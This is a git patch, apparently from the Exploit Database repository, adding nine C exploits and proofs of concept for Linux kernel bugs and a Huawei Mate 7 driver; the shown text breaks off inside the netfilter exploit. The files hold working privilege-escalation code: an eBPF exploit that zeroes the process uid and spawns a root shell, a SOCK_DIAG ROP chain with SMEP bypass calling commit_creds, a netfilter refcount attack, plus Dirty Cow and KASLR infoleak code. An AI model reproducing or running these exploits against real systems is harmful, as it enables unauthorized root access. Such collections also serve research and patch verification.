From 224c305b0d4d8fca40dceb621efbe9f6e7d91736 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 20 Mar 2018 05:01:55 +0000 Subject: [PATCH] DB: 2018-03-20 9 changes to exploits/shellcodes Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Linux 2.6.36 IGMP - Remote Denial of Service Linux Kernel 2.6.36 IGMP - Remote Denial of Service Linux - SELinux W+X Protection Bypass via AIO Linux SELinux - W+X Protection Bypass via AIO Linux group_info refcounter - Overflow Memory Corruption Linux Kernel - 'group_info' refcounter Overflow Memory Corruption Linux io_submit L2TP sendmsg - Integer Overflow Linux Kernel - io_submit L2TP sendmsg Integer Overflow Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) Linux Kernel < 4.5.1 - Off-By-One (PoC) Linux Kernel - 'mincore()' Heap Page Disclosure (PoC) Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow Linux VServer Project 1.2x - CHRoot Breakout Linux VServer Project 1.2x - Chroot Breakout Linux espfix64 - Nested NMIs Interrupting Privilege Escalation Linux (x86) - Memory Sinkhole Privilege Escalation Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation Linux Kernel (x86) - Memory Sinkhole Privilege Escalation Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation --- exploits/hardware/local/44306.c | 45 ++++ exploits/linux/dos/44301.c | 263 ++++++++++++++++++++++++ exploits/linux/dos/44304.c | 40 ++++ exploits/linux/dos/44305.c | 91 +++++++++ exploits/linux/local/44298.c | 247 ++++++++++++++++++++++ exploits/linux/local/44299.c | 153 ++++++++++++++ exploits/linux/local/44300.c | 267 ++++++++++++++++++++++++ exploits/linux/local/44302.c | 349 ++++++++++++++++++++++++++++++++ exploits/linux/local/44303.c | 307 ++++++++++++++++++++++++++++ files_exploits.csv | 43 ++-- 10 files changed, 1788 insertions(+), 17 deletions(-) create mode 100644 exploits/hardware/local/44306.c create mode 100644 exploits/linux/dos/44301.c create mode 100644 exploits/linux/dos/44304.c create mode 100644 exploits/linux/dos/44305.c create mode 100644 exploits/linux/local/44298.c create mode 100644 exploits/linux/local/44299.c create mode 100644 exploits/linux/local/44300.c create mode 100644 exploits/linux/local/44302.c create mode 100644 exploits/linux/local/44303.c diff --git a/exploits/hardware/local/44306.c b/exploits/hardware/local/44306.c new file mode 100644 index 000000000..814c78c74 --- /dev/null +++ b/exploits/hardware/local/44306.c @@ -0,0 +1,45 @@ +/* + * + * HuaWei Mate7 hifi driver Poc + * + * Writen by pray3r, + * + */ + +#include +#include +#include +#include +#include +#include + +#define HIFI_MISC_IOCTL_WRITE_PARAMS _IOWR('A', 0x75, struct misc_io_sync_param) + +struct misc_io_sync_param { + void * para_in; + unsigned int para_size_in; + void * para_out; + unsigned int para_size_out; +}; + +int main(int arg, char **argv) +{ + int fd; + void *in = malloc(300 * 1024); + void *out = malloc(100); + struct misc_io_sync_param poc; + + poc.para_in = in; + poc.para_size_in = 300 * 1024; + poc.para_out = out; + poc.para_size_out = 100; + + fd = open("/dev/hifi_misc", O_RDWR); + + ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc); + + free(in); + free(out); + + return 0; +} \ No newline at end of file diff --git a/exploits/linux/dos/44301.c b/exploits/linux/dos/44301.c new file mode 100644 index 000000000..7fa9f9cf0 --- /dev/null +++ b/exploits/linux/dos/44301.c @@ -0,0 +1,263 @@ +/** + EDB Note ~ Download: http://cyseclabs.com/exploits/matreshka.c + Blog ~ http://cyseclabs.com/blog/cve-2016-6187-heap-off-by-one-exploit +**/ + +/** + * Quick and dirty PoC for CVE-2016-6187 heap off-by-one PoC + * By Vitaly Nikolenko + * vnik@cyseclabs.com + * + * There's no privilege escalation payload but the kernel will execute + * instructions from 0xdeadbeef. + * + * gcc matreshka.c -o matreshka -lpthread + * + * greetz to dmr and s1m0n + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +void setup_pagefault(void *, unsigned, uint8_t); + +const int pagesize = 4096; + +struct { + long mtype; + char mtext[48]; +} msg; + +struct thread_struct { + int fd; + uint8_t h_sw; // handler switch + uint8_t count; +}; + +struct subprocess_info { + long a; long b; long c; long d; // 32 bytes for work_struct + long *complete; + char *path; + char **argv; + char **envp; + int wait; + int retval; + int (*init)(void); + int (*cleanup)(void); + void *data; +}; + +void *pf_handler(void *data) { + struct thread_struct *params = data; + int count = params->count; + + int fd = params->fd; + + for (;;) { + struct uffd_msg msg; + + struct pollfd pollfd[1]; + pollfd[0].fd = params->fd; + pollfd[0].events = POLLIN; + int pollres; + + pollres = poll(pollfd, 1, -1); + switch (pollres) { + case -1: + perror("poll userfaultfd"); + continue; + break; + case 0: continue; break; + case 1: break; + default: + exit(2); + } + if (pollfd[0].revents & POLLERR) { + exit(1); + } + if (!(pollfd[0].revents & POLLIN)) { + continue; + } + + int readret; + readret = read(fd, &msg, sizeof(msg)); + + if (readret == -1) { + if (errno == EAGAIN) + continue; + perror("read userfaultfd"); + } + + if (readret != sizeof(msg)) { + fprintf(stderr, "short read, not expected, exiting\n"); + exit(1); + } + + long long addr = msg.arg.pagefault.address; + char buf[pagesize]; + long *ptr = (long *)buf; + + // just for lolz + memset(buf, 'B', pagesize); + + struct uffdio_copy cp; + cp.src = (long long)buf; + cp.dst = (long long)(addr & ~(0x1000 - 1)); + cp.len = (long long)pagesize; + cp.mode = 0; + + void *tmp_addr; + + if (count != 3) { + if (count % 2) + tmp_addr = (void *)(0x40000000 & ~(0x1000 - 1)); + else + tmp_addr = (void *)((0x40000000 & ~(0x1000 - 1)) + 0x1000); + + // remap and set up the page fault hander + munmap(tmp_addr, 0x1000); + void *region = mmap(tmp_addr, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); + setup_pagefault(tmp_addr, 0x1000, ++count); + } else { + // change the first page which is already mmaped + struct subprocess_info *p = (struct subprocess_info *)(0x40000000 + 0x1000 - 88); + p->path = 0; + p->cleanup = (void *)0xdeadbeef; + } + + if (ioctl(fd, UFFDIO_COPY, &cp) == -1) { + perror("ioctl(UFFDIO_COPY)"); + } + } + return NULL; +} + + +void setup_pagefault(void *addr, unsigned size, uint8_t count) { + void *region; + int uffd; + pthread_t uffd_thread; + struct uffdio_api uffdio_api; + + uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); + + if (uffd == -1) { + perror("syscall"); + return; + } + + uffdio_api.api = UFFD_API; + uffdio_api.features = 0; + + // just to be nice + if (ioctl(uffd, UFFDIO_API, &uffdio_api)) { + fprintf(stderr, "UFFDIO_API\n"); + exit(1); + } + + if (uffdio_api.api != UFFD_API) { + fprintf(stderr, "UFFDIO_API error %Lu\n", uffdio_api.api); + exit(1); + } + + struct uffdio_register uffdio_register; + uffdio_register.range.start = (unsigned long)addr; + uffdio_register.range.len = size; + uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; + + if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) { + perror("ioctl(UFFDIO_REGISTER)"); + exit(1); + } + printf("userfaultfd ioctls: 0x%llx\n", uffdio_register.ioctls); + + int expected = UFFD_API_RANGE_IOCTLS; + if ((uffdio_register.ioctls & expected) != expected) { + fprintf(stderr, "ioctl set is incorrect\n"); + exit(1); + } + + struct thread_struct thr_params; + struct thread_struct *params = (struct thread_struct *)malloc(sizeof(struct thread_struct)); + params->fd = uffd; + params->count = count; + pthread_create(&uffd_thread, NULL, pf_handler, (void *)params); +} + +int main(int argc, char **argv) { + void *region, *map; + pthread_t uffd_thread; + int uffd, msqid, i; + + region = (void *)mmap((void *)0x40000000, 0x2000, PROT_READ|PROT_WRITE, + MAP_FIXED|MAP_PRIVATE|MAP_ANON, -1, 0); + + if (!region) { + perror("mmap"); + exit(2); + } + + setup_pagefault(region + 0x1000, 0x1000, 1); + + printf("my pid = %d\n", getpid()); + + if (!map) { + perror("mmap"); + } + + //memset(msg.mtext, 'A', sizeof(msg.mtext)-1); + unsigned long *p = (unsigned long *)msg.mtext; + for (i = 0; i < 6; i++) { + *p ++ = 0x0000000040000000 + 0x1000 - 88; + } + msg.mtype = 1; + + msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + + for (i = 0; i < 320; i++) { // that's generally the limit + if (msgsnd(msqid, &msg, 48, 0) == -1) { + perror("msgsnd"); + return -1; + } + } + + char buf[96]; + p = (unsigned long *)buf; + + for (i = 0; i < 11; i++) { + *p ++ = 0x40000000 + 0x1000 - 88; + } + *p ++ = 0xfffffffffffffff; + + int fd = open("/proc/self/attr/current", O_RDWR); + write(fd, buf, 96); + + // go figure why we do it 3 times + msgsnd(msqid, &msg, 48, 0); + msgsnd(msqid, &msg, 48, 0); + msgsnd(msqid, &msg, 48, 0); + + socket(22, AF_INET, 0); + + close(fd); + return 0; +} \ No newline at end of file diff --git a/exploits/linux/dos/44304.c b/exploits/linux/dos/44304.c new file mode 100644 index 000000000..010d0ac6c --- /dev/null +++ b/exploits/linux/dos/44304.c @@ -0,0 +1,40 @@ +/* + * The source is modified from + * https://bugs.chromium.org/p/project-zero/issues/detail?id=1431 + * I try to find out infomation useful from the infoleak + * The kernel address can be easily found out from the uninitialized memory + * leaked from kernel, which can help bypass kaslr + */ + +#define _GNU_SOURCE +#include +#include +#include +#include + +int main(void) { + unsigned char buf[getpagesize()/sizeof(unsigned char)]; + int right = 1; + unsigned long addr = 0; + + /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */ + if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) + err(1, "mmap"); + + while(right){ + /* Touch a mishandle with this type mapping */ + if (mincore((void*)0x86000000, 0x1000000, buf)) + perror("mincore"); + for( int n=0; n 0xffffffff00000000){ + right = 0; + goto out; + } + } + } + out: + printf("%p\n", addr); + return 0; +} \ No newline at end of file diff --git a/exploits/linux/dos/44305.c b/exploits/linux/dos/44305.c new file mode 100644 index 000000000..65a31bc25 --- /dev/null +++ b/exploits/linux/dos/44305.c @@ -0,0 +1,91 @@ +/* + * The code is modified from https://www.exploit-db.com/exploits/43199/ + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define TRIES_PER_PAGE (20000000) +#define PAGE_SIZE (0x1000) +#define MEMESET_VAL (0x41) +#define MAP_SIZE (0x200000) +#define STRING "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char)) + +struct args{ + int fd; + void *p; + int stop; + off_t off; + char *chp; +}; + +void *write_thread(struct args *arg) { + for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) { + lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET); + write(arg->fd, STRING, sizeof(STRING)); + lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET); + } + return NULL; +} + +void *wait_for_success(struct args *arg) { + while(*(arg->chp+arg->off*OFFSIZE) != 'A') { + int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED); + sched_yield(); + } + arg->stop = 1; + return NULL; +} + +int main(void) { + struct args arg; + + arg.off = 0; + + arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + + if(arg.p == MAP_FAILED) + perror("[!] mmap()"); + arg.chp = arg.p; + printf("mmap address is %p\n", arg.p); + madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE); + + arg.fd = open("/proc/self/mem", O_RDWR); + if (arg.fd < 0) { + perror("[!] open()"); + return 1; + } + + + while(arg.off < PAGE_SIZE/sizeof(STRING)) { + arg.stop = 0; + pthread_t thread0, thread1; + int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg); + ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg); + + if (ret) { + perror("[!] pthread_create()"); + return 1; + } + + pthread_join(thread0, NULL); + pthread_join(thread1, NULL); + + printf("[*] Done 0x%x String\n", arg.off); + arg.off++; + } + printf("[*] Overwrite a page\n"); + printf("%s\n", arg.p); + return 0; +} \ No newline at end of file diff --git a/exploits/linux/local/44298.c b/exploits/linux/local/44298.c new file mode 100644 index 000000000..c88b6a11c --- /dev/null +++ b/exploits/linux/local/44298.c @@ -0,0 +1,247 @@ +/* + * Ubuntu 16.04.4 kernel priv esc + * + * all credits to @bleidl + * - vnik + */ + +// Tested on: +// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 +// if different kernel adjust CRED offset + check kernel stack size +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PHYS_OFFSET 0xffff880000000000 +#define CRED_OFFSET 0x5f8 +#define UID_OFFSET 4 +#define LOG_BUF_SIZE 65536 +#define PROGSIZE 328 + +int sockets[2]; +int mapfd, progfd; + +char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff" + "\x55\x09\x02\x00\xff\xff\xff\xff" + "\xb7\x00\x00\x00\x00\x00\x00\x00" + "\x95\x00\x00\x00\x00\x00\x00\x00" + "\x18\x19\x00\x00\x03\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\xbf\x91\x00\x00\x00\x00\x00\x00" + "\xbf\xa2\x00\x00\x00\x00\x00\x00" + "\x07\x02\x00\x00\xfc\xff\xff\xff" + "\x62\x0a\xfc\xff\x00\x00\x00\x00" + "\x85\x00\x00\x00\x01\x00\x00\x00" + "\x55\x00\x01\x00\x00\x00\x00\x00" + "\x95\x00\x00\x00\x00\x00\x00\x00" + "\x79\x06\x00\x00\x00\x00\x00\x00" + "\xbf\x91\x00\x00\x00\x00\x00\x00" + "\xbf\xa2\x00\x00\x00\x00\x00\x00" + "\x07\x02\x00\x00\xfc\xff\xff\xff" + "\x62\x0a\xfc\xff\x01\x00\x00\x00" + "\x85\x00\x00\x00\x01\x00\x00\x00" + "\x55\x00\x01\x00\x00\x00\x00\x00" + "\x95\x00\x00\x00\x00\x00\x00\x00" + "\x79\x07\x00\x00\x00\x00\x00\x00" + "\xbf\x91\x00\x00\x00\x00\x00\x00" + "\xbf\xa2\x00\x00\x00\x00\x00\x00" + "\x07\x02\x00\x00\xfc\xff\xff\xff" + "\x62\x0a\xfc\xff\x02\x00\x00\x00" + "\x85\x00\x00\x00\x01\x00\x00\x00" + "\x55\x00\x01\x00\x00\x00\x00\x00" + "\x95\x00\x00\x00\x00\x00\x00\x00" + "\x79\x08\x00\x00\x00\x00\x00\x00" + "\xbf\x02\x00\x00\x00\x00\x00\x00" + "\xb7\x00\x00\x00\x00\x00\x00\x00" + "\x55\x06\x03\x00\x00\x00\x00\x00" + "\x79\x73\x00\x00\x00\x00\x00\x00" + "\x7b\x32\x00\x00\x00\x00\x00\x00" + "\x95\x00\x00\x00\x00\x00\x00\x00" + "\x55\x06\x02\x00\x01\x00\x00\x00" + "\x7b\xa2\x00\x00\x00\x00\x00\x00" + "\x95\x00\x00\x00\x00\x00\x00\x00" + "\x7b\x87\x00\x00\x00\x00\x00\x00" + "\x95\x00\x00\x00\x00\x00\x00\x00"; + +char bpf_log_buf[LOG_BUF_SIZE]; + +static int bpf_prog_load(enum bpf_prog_type prog_type, + const struct bpf_insn *insns, int prog_len, + const char *license, int kern_version) { + union bpf_attr attr = { + .prog_type = prog_type, + .insns = (__u64)insns, + .insn_cnt = prog_len / sizeof(struct bpf_insn), + .license = (__u64)license, + .log_buf = (__u64)bpf_log_buf, + .log_size = LOG_BUF_SIZE, + .log_level = 1, + }; + + attr.kern_version = kern_version; + + bpf_log_buf[0] = 0; + + return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); +} + +static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size, + int max_entries) { + union bpf_attr attr = { + .map_type = map_type, + .key_size = key_size, + .value_size = value_size, + .max_entries = max_entries + }; + + return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)); +} + +static int bpf_update_elem(uint64_t key, uint64_t value) { + union bpf_attr attr = { + .map_fd = mapfd, + .key = (__u64)&key, + .value = (__u64)&value, + .flags = 0, + }; + + return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); +} + +static int bpf_lookup_elem(void *key, void *value) { + union bpf_attr attr = { + .map_fd = mapfd, + .key = (__u64)key, + .value = (__u64)value, + }; + + return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)); +} + +static void __exit(char *err) { + fprintf(stderr, "error: %s\n", err); + exit(-1); +} + +static void prep(void) { + mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3); + if (mapfd < 0) + __exit(strerror(errno)); + + progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, + (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0); + + if (progfd < 0) + __exit(strerror(errno)); + + if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) + __exit(strerror(errno)); + + if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) + __exit(strerror(errno)); +} + +static void writemsg(void) { + char buffer[64]; + + ssize_t n = write(sockets[0], buffer, sizeof(buffer)); + + if (n < 0) { + perror("write"); + return; + } + if (n != sizeof(buffer)) + fprintf(stderr, "short write: %lu\n", n); +} + +#define __update_elem(a, b, c) \ + bpf_update_elem(0, (a)); \ + bpf_update_elem(1, (b)); \ + bpf_update_elem(2, (c)); \ + writemsg(); + +static uint64_t get_value(int key) { + uint64_t value; + + if (bpf_lookup_elem(&key, &value)) + __exit(strerror(errno)); + + return value; +} + +static uint64_t __get_fp(void) { + __update_elem(1, 0, 0); + + return get_value(2); +} + +static uint64_t __read(uint64_t addr) { + __update_elem(0, addr, 0); + + return get_value(2); +} + +static void __write(uint64_t addr, uint64_t val) { + __update_elem(2, addr, val); +} + +static uint64_t get_sp(uint64_t addr) { + return addr & ~(0x4000 - 1); +} + +static void pwn(void) { + uint64_t fp, sp, task_struct, credptr, uidptr; + + fp = __get_fp(); + if (fp < PHYS_OFFSET) + __exit("bogus fp"); + + sp = get_sp(fp); + if (sp < PHYS_OFFSET) + __exit("bogus sp"); + + task_struct = __read(sp); + + if (task_struct < PHYS_OFFSET) + __exit("bogus task ptr"); + + printf("task_struct = %lx\n", task_struct); + + credptr = __read(task_struct + CRED_OFFSET); // cred + + if (credptr < PHYS_OFFSET) + __exit("bogus cred ptr"); + + uidptr = credptr + UID_OFFSET; // uid + if (uidptr < PHYS_OFFSET) + __exit("bogus uid ptr"); + + printf("uidptr = %lx\n", uidptr); + __write(uidptr, 0); // set both uid and gid to 0 + + if (getuid() == 0) { + printf("spawning root shell\n"); + system("/bin/bash"); + exit(0); + } + + __exit("not vulnerable?"); +} + +int main(int argc, char **argv) { + prep(); + pwn(); + + return 0; +} \ No newline at end of file diff --git a/exploits/linux/local/44299.c b/exploits/linux/local/44299.c new file mode 100644 index 000000000..28b390af9 --- /dev/null +++ b/exploits/linux/local/44299.c @@ -0,0 +1,153 @@ +/** + * based on the exploit by SynQ + * + * Modified PoC for CVE-2013-1763 with SMEP bypass + * Presentation: Practical SMEP Bypass Techniques on Linux + * Vitaly Nikolenko + * vnik@cyseclabs.com + * + * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux + * + * gcc sockdiag_smep.c -O2 -o pwn + */ + +/** + EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ +**/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +//#include +//#include +//#include +#include "sock_diag.h" +#include "unix_diag.h" +#include "netlink.h" + +unsigned long user_cs; +unsigned long user_ss; +unsigned long user_rflags; + +typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); +_commit_creds commit_creds; +_prepare_kernel_cred prepare_kernel_cred; +unsigned long sock_diag_handlers, nl_table; + +static void saveme() { + asm( + "movq %%cs, %0\n" + "movq %%ss, %1\n" + "pushfq\n" + "popq %2\n" + : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory" ); +} + +void shell(void) { + if(!getuid()) + system("/bin/sh"); + + exit(0); +} + +static void restore() { + asm volatile( + "swapgs ;" + "movq %0, 0x20(%%rsp)\t\n" + "movq %1, 0x18(%%rsp)\t\n" + "movq %2, 0x10(%%rsp)\t\n" + "movq %3, 0x08(%%rsp)\t\n" + "movq %4, 0x00(%%rsp)\t\n" + "iretq" + : : "r" (user_ss), + "r" ((unsigned long)0x36000000), + "r" (user_rflags), + "r" (user_cs), + "r" (shell) + ); +} + +int __attribute__((regparm(3))) +kernel_code() +{ + commit_creds(prepare_kernel_cred(0)); + restore(); + + return -1; +} + +int main(int argc, char*argv[]) +{ + int fd; + + struct sock_diag_handler { + __u8 family; + int (*dump)(void *a, void *b); + }; + + unsigned family; + struct { + struct nlmsghdr nlh; + struct unix_diag_req r; + } req; + + if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ + printf("Can't create sock diag socket\n"); + return -1; + } + + void *mapped; + void *fakestruct; + struct sock_diag_handler a; + a.dump = (void *)0xffffffff8100b74f; + + commit_creds = (_commit_creds) 0xffffffff8107ee30; + prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0; + + assert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000); + memcpy(fakestruct+0xad38, &a, sizeof(a)); + + assert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000); + + unsigned long *fakestack = (unsigned long *)mapped; + *fakestack ++= 0xffffffff01661ef4; + int p; + for (p = 0; p < 0x1000000; p++) + *fakestack ++= 0xffffffff8100ad9eUL; + + fakestack = (unsigned long *)(mapped + 0x7000000); + printf("[+] fake stack addr = %lx\n", (long unsigned)fakestack); + *fakestack ++= 0xffffffff8133dc8fUL; + *fakestack ++= 0x407e0; + *fakestack ++= 0xffffffff810032edUL; + *fakestack ++= 0xdeadbeef; + *fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = sizeof(req); + req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; + req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; + req.nlh.nlmsg_seq = 123456; + + req.r.sdiag_family = 45; + + req.r.udiag_states = -1; + req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; + + saveme(); + if ( send(fd, &req, sizeof(req), 0) < 0) { + printf("bad send\n"); + close(fd); + return -1; + } +} \ No newline at end of file diff --git a/exploits/linux/local/44300.c b/exploits/linux/local/44300.c new file mode 100644 index 000000000..ad4a9916c --- /dev/null +++ b/exploits/linux/local/44300.c @@ -0,0 +1,267 @@ +/** + EDB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44300.zip + Video ~ https://www.youtube.com/watch?v=qchiJn94kTo +**/ + +/** decr.c **/ +/** + * Ubuntu 16.04 local root exploit - netfilter target_offset OOB + * check_compat_entry_size_and_hooks/check_entry + * + * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c + * + * Vitaly Nikolenko + * vnik@cyseclabs.com + * 23/04/2016 + * + * + * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers + * automatic loading). + * + * vnik@ubuntu:~$ uname -a + * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux + * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr + * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn + * vnik@ubuntu:~$ ./decr + * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik + * [!] Decrementing the refcount. This may take a while... + * [!] Wait for the "Done" message (even if you'll get the prompt back). + * vnik@ubuntu:~$ [+] Done! Now run ./pwn + * + * vnik@ubuntu:~$ ./pwn + * [+] Escalating privs... + * root@ubuntu:~# id + * uid=0(root) gid=0(root) groups=0(root) + * root@ubuntu:~# + * + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MALLOC_SIZE 66*1024 + +int check_smaep() { + FILE *proc_cpuinfo; + char fbuf[512]; + + proc_cpuinfo = fopen("/proc/cpuinfo", "r"); + + if (proc_cpuinfo < 0) { + perror("fopen"); + return -1; + } + + memset(fbuf, 0, sizeof(fbuf)); + + while(fgets(fbuf, 512, proc_cpuinfo) != NULL) { + if (strlen(fbuf) == 0) + continue; + + if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) { + fclose(proc_cpuinfo); + return -1; + } + } + + fclose(proc_cpuinfo); + return 0; +} + +int check_mod() { + FILE *proc_modules; + char fbuf[256]; + + proc_modules = fopen("/proc/modules", "r"); + + if (proc_modules < 0) { + perror("fopen"); + return -1; + } + + memset(fbuf, 0, sizeof(fbuf)); + + while(fgets(fbuf, 256, proc_modules) != NULL) { + if (strlen(fbuf) == 0) + continue; + + if (!strncmp("ip_tables", fbuf, 9)) { + fclose(proc_modules); + return 0; + } + } + + fclose(proc_modules); + return -1; +} + +int decr(void *p) { + int sock, optlen; + int ret; + void *data; + struct ipt_replace *repl; + struct ipt_entry *entry; + struct xt_entry_match *ematch; + struct xt_standard_target *target; + unsigned i; + + sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); + + if (sock == -1) { + perror("socket"); + return -1; + } + + data = malloc(MALLOC_SIZE); + + if (data == NULL) { + perror("malloc"); + return -1; + } + + memset(data, 0, MALLOC_SIZE); + + repl = (struct ipt_replace *) data; + repl->num_entries = 1; + repl->num_counters = 1; + repl->size = sizeof(*repl) + sizeof(*target) + 0xffff; + repl->valid_hooks = 0; + + entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace)); + entry->target_offset = 74; // overwrite target_offset + entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target); + + ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry)); + + strcpy(ematch->u.user.name, "icmp"); + void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0); + uint64_t *me = (uint64_t *)(kmatch + 0x58); + *me = 0xffffffff821de10d; // magic number! + + uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4); + *match = (uint32_t)kmatch; + + ematch->u.match_size = (short)0xffff; + + target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8); + uint32_t *t = (uint32_t *)target; + *t = (uint32_t)kmatch; + + printf("[!] Decrementing the refcount. This may take a while...\n"); + printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n"); + + for (i = 0; i < 0xffffff/2+1; i++) { + ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024); + } + + 